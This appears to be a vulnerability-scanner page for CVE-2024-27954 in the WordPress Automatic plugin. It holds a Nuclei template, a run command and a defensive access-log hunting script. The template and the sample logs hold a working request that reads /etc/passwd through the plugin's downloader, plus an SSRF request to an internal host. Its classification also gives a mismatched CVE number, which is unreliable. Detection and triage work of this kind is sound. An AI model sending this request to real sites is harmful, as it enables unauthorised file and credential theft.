WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
ID: CVE-2024-27954
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
Description
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF. The flaw, located in the downloader.php file, could permit attackers to download any file from the site; sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
YAML Source
id: CVE-2024-27954

info:
  name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
  reference:
    - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/
    - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
  classification:
    cvss-score: 9.8
    cve-id: CVE-2022-1970
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/wp-automatic"
  tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic

http:
  - method: GET
    path:
      - "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"link":"file:'

      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100d08819c2a73aaaad150fca69143ee273dc832941a31a321cedfd9d0cfbd4184002204dc522ac7c4ffd55ffb76834f9405dbb19c3babf74fd69c7816a3c8ce3532d89:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability with the Nuclei scanner: it sends the single GET request defined in the YAML source and reports a hit only when the response body contains both the '"link":"file:' marker and a line matching the regex "root:.*:0:0:" (matchers-condition: and). Run it against one target with:
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-27954.yaml"
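The request path in the template is also the pattern a defender wants to find in web-server access logs, and the check a patched downloader has to apply to the link parameter is the same one a log scanner applies after the fact: reject any scheme other than http/https and any literal internal address. The script below is an added example written for this page, not the Nuclei template's or the plugin's own code; it assumes Apache/nginx combined log format, and the four log lines are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Hunt access logs for wp_automatic=download requests whose link= value
points at a local file or an internal host (the CVE-2024-27954 pattern).

Added example for this page, not code from the Nuclei template or the
plugin. Assumes Apache/nginx combined log format; sample lines below are
constructed, not real traffic.
"""
import ipaddress
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (combined log format).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1812 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:10:01:09 +0000] "GET /?p=3232&wp_automatic=download&link=http://10.0.0.5/admin HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.4 - - [10/Mar/2024:10:02:15 +0000] "GET /?p=3232&wp_automatic=download&link=https://example.com/feed.xml HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2024:10:03:40 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, method and request target from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def classify_link(link: str) -> Optional[str]:
    """Return a finding label for a link= value, or None if it looks benign.

    This is the same validation a fixed downloader should enforce before
    fetching anything: only http/https, and never a literal internal address.
    """
    parts = urlsplit(link)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        # file://, php://, gopher:// etc.: local file read or non-HTTP SSRF
        return f"non-http scheme {scheme or '<none>'}"
    host = parts.hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None  # a hostname, not a literal IP; treated as benign here
    if addr.is_private or addr.is_loopback or addr.is_link_local:
        return f"internal target {host}"
    return None


def scan_access_log(text: str) -> list:
    """Return one finding dict per suspicious wp_automatic download request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        if query.get("wp_automatic") != ["download"]:
            continue
        for link in query.get("link", []):
            reason = classify_link(link)
            if reason:
                findings.append({"ip": m.group("ip"), "link": link, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']}: {f['reason']} ({f['link']})")
```

On the sample input the first two lines are flagged (file scheme, then a private address) and the feed fetch from a public hostname is left alone; feed the script a real combined-format log via `SAMPLE_LOG` replaced by file contents to triage a site that ran the vulnerable plugin.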